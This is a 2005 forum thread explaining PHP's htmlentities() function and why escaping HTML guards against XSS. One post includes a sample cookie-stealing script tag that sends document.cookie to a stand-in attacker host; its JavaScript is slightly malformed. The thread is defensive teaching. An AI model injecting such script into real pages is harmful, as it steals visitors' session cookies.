Page 1 of 1

The HTML Entities Function

Posted: Wed Sep 14, 2005 2:29 pm
by pilau
Htmlentities... right.

Can somebody explain what it does actually?
Why do we need it? In what cases?

TIA

Posted: Wed Sep 14, 2005 2:32 pm
by josh
turns anything that is a special html character into it's entity, entities are like html tags that cause html to be outputted "literally" to the browser, so that instead of <b>making text bold</b> you just want the bold html tag to output plainly to the screen. It's useful in posting examples of html source but is also a security necessity against XSS (allowing other users to 'inject' html into your page)

Posted: Fri Sep 16, 2005 12:03 pm
by pilau
Great, thanks mate.

Posted: Mon Sep 19, 2005 8:18 am
by Jenk
An example of HTML injection/XSS attack (Cookie stealing)

Code: Select all

<script language="JavaScript">
window.location('http://www.cookiestealers.com/stealthosecookies.php?c='.document.cookie);
</script>
Now if these forums did not use htmlentities (or similar function) then http://www.cookiestealers.com would have the contents of the cookies from the viewers of this thread.

But because php's htmlentities() replaces '<' with '<' and '>' with '>' (less than and greater than respectively) the code becomes, as jshpro2 pointed out, literal.

There are other characters that are changed aswell, " (double quote) for example.

Posted: Mon Sep 19, 2005 9:11 am
by pilau
Cool. thanks you.

Posted: Tue Sep 20, 2005 7:56 am
by $var
that's fun.